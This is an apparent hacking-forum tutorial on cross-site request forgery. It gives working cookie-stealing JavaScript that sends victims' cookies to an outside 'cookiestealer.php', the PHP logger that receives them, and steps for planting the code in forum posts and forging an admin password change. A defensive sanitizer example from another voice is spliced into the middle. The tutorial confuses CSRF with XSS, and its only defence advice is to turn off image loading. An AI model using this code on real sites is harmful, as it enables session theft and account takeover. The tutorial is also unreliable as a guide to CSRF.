GreekHacking-root@greekhacking.gr


NiKR

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called CSRF as well as XSRF. CSRF stands for Cross-Site Request Forgery. If you say XSRF the X obviously stands for the cross, just like XSS (Cross-Site Scripting).

I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

1) What is Cross-Site Request Forgery?
2) How do I find CSRF vulnerabilities?
3) How to take advantage of the IMG tag?
4) Keep it Simple
5) Securing yourself against CSRF
6) Conclusion

 

1) What is Cross-Site Request Forgery?

When performing a CSRF attack you inject code into a webpage, for example on a forum or any other site where you can post comments. The idea is to make the browser execute an HTTP request as soon as a user visits the affected page. Because this attack takes place on the victim's side (client-side), the request is sent from the machine of the victim who visits the page, carrying that victim's cookies. If, for example, a user is logged in to YouTube, a link can be crafted and hidden on a forum that logs that user out of YouTube.

We can go much further than that, for example by making a request to a webpage that, upon being visited, issues a few other requests using JavaScript. This can be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found on poorly secured webpages that let everyone make posts and comments (guests can comment). The useful part of that is that you can create a post which is seen by everyone who visits the page.

It does have to be possible to use HTML or BBCode in the post, though.

The IMG Tag

An IMG tag in HTML (<img>) is usually used as follows:

<img src="http://website.com/myimage.jpg">

As you may know, PHP pages are also able to return images. This makes the following possible, for example:

<img src="http://website.com/my_php_page.php">

If the PHP page my_php_page returns an image, the image will be displayed by the HTML tag.
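Sections 2 and 3 hinge on the site accepting arbitrary HTML in posts, so that an IMG tag can point at a .php page. As an added example (not code from the original post), the following JavaScript for Node.js shows how a forum could sanitize user-submitted HTML so that img tags are only kept when their src is an https URL to a static image file on an allowlisted host; anything else, including the my_php_page.php case above, is dropped and reported. ALLOWED_IMAGE_HOSTS, checkImageSrc and sanitizeImageTags are assumed names, and cdn.example.com is a constructed placeholder host.

```javascript
// Added example, not code from the original post: keep <img> tags in user
// content only when they point at a static image on an allowlisted host.
// Assumed names: ALLOWED_IMAGE_HOSTS, checkImageSrc, sanitizeImageTags.

// Constructed allowlist; a real site would list its own image CDN hosts.
const ALLOWED_IMAGE_HOSTS = new Set(["cdn.example.com"]);
const IMAGE_EXTENSIONS = /\.(jpe?g|png|gif|webp)$/i;

// Returns { ok: true, href } with the normalized URL, or { ok: false, reason }.
function checkImageSrc(src) {
  let url;
  try {
    url = new URL(src);                     // relative URLs throw: rejected
  } catch (e) {
    return { ok: false, reason: "unparseable or relative URL" };
  }
  if (url.protocol !== "https:") return { ok: false, reason: "non-https scheme" };
  if (!ALLOWED_IMAGE_HOSTS.has(url.hostname)) return { ok: false, reason: "host not allowlisted" };
  if (url.search || url.hash) return { ok: false, reason: "query string or fragment present" };
  if (!IMAGE_EXTENSIONS.test(url.pathname)) return { ok: false, reason: "path is not a static image" };
  return { ok: true, href: url.href };
}

// Matches an <img ...> tag and captures its src value (double-, single- or unquoted).
const IMG_TAG = /<img\b[^>]*?\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))[^>]*>/gi;

// Rebuilds every accepted <img> with only a normalized src (other attributes
// such as event handlers are discarded) and removes the rest; returns the
// cleaned HTML plus a list of what was removed and why, which is worth logging.
function sanitizeImageTags(html) {
  const rejected = [];
  const clean = html.replace(IMG_TAG, (tag, dq, sq, bare) => {
    const src = dq !== undefined ? dq : sq !== undefined ? sq : bare;
    const result = checkImageSrc(src);
    if (result.ok) return `<img src="${result.href}" alt="">`;
    rejected.push({ src, reason: result.reason });
    return "";
  });
  return { html: clean, rejected };
}
```

The check deliberately refuses query strings and non-image extensions: a forum has no way to know what a .php URL will return, so the safe policy is to allow only what is known to be a static file on a host the site controls, and to log the rejections so an abuse attempt shows up in the moderation queue.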

 

3) How to take advantage of the IMG tag?

So how do we actually do it? As I said, PHP pages can also return images. Let's take this simple scenario:

You've just found a webpage where comments can be posted, and HTML is allowed inside the comments. The website does not check the Referer header, and the IMG tag accepts URLs pointing at .php pages. You write some PHP code that returns an image but at the same time runs some JavaScript that sends the victim to another page. If someone visits the page where you used the IMG tag, a picture is shown, but the JavaScript code runs as well. This way you can steal cookies, for example, or even write and post comments under somebody else's name.
Suppose we have the following code:

<html><head><script type="text/javascript">
    var http = GetXmlHttpObject();
    if(http != null)
    {
      // document.cookie only exposes cookies that are not flagged HttpOnly
      var url = "http://mywebsite.com/cookiestealer.php?cookie=" + document.cookie;
      http.open("GET", url, false);
      http.send(null);
    }

    function GetXmlHttpObject()
    {
      // Standard helper of the era: native XMLHttpRequest, or the ActiveX
      // object on old Internet Explorer; null if neither is available.
      if (window.XMLHttpRequest)
      {
        return new XMLHttpRequest();
      }
      if (window.ActiveXObject)
      {
        return new ActiveXObject("Microsoft.XMLHTTP");
      }
      return null;
    }
</script></head><body></body></html>
Note: In this case I did not write PHP code to display an image. This is simple HTML/JS code that executes an HTTP request to a certain page.

If you're a little familiar with JS you can see that this makes an HTTP GET request to the page mywebsite.com/cookiestealer.php, passing a GET argument whose value is document.cookie. document.cookie always contains the cookies of the page on which the JavaScript code is executed, so in this case it contains the cookies of the user visiting the page.
On the website I found, I uploaded the following code:

<?php
    // The cookie value passed in the GET argument, and the visitor's IP address.
    $cookie = $_GET['cookie'];
    $ip = $_SERVER['REMOTE_ADDR'];

    // Append both to log.txt, one entry per visit.
    $fh = fopen("log.txt", 'a') or die("can't open file");
    fwrite($fh, $cookie . "\n" . $ip . "\n\n");

    fclose($fh);
?>

This PHP code reads the value of the GET argument and the IP address of the person visiting your page, then appends this information to the file called 'log.txt'.

Every time someone visits the page where I posted the IMG tag, whose link points at the page that executes the JS code, that code requests the cookiestealer with the cookie in the GET argument.
Finally, you can watch the cookies flow into your log.

4) Keep it Simple.

In the code above I showed a rather extensive example. Really badly secured websites with bad software have even bigger bugs than that.

For example, you can first install the forum software locally and look at which HTTP GET request you have to make to change the administrator's password. Pretend it's like the following:

You'd then have to send that URL to the administrator in a private message, inside an IMG tag. If the administrator reads the message, a request is made to the above URL and the admin password is changed to mynewpass123.
I have to say, it's often a lot harder than the above example.

5) Protecting yourself against CSRF
You can protect yourself against CSRF attacks by, for example, turning off image loading in your browser.

6) Conclusion
So what is a CSRF attack? A CSRF attack is an attack that can be carried out with little effort, if you know what you're doing, and can do a lot of damage. Protecting against CSRF attacks is harder, but worth doing if you're working on, for example, a CMS.
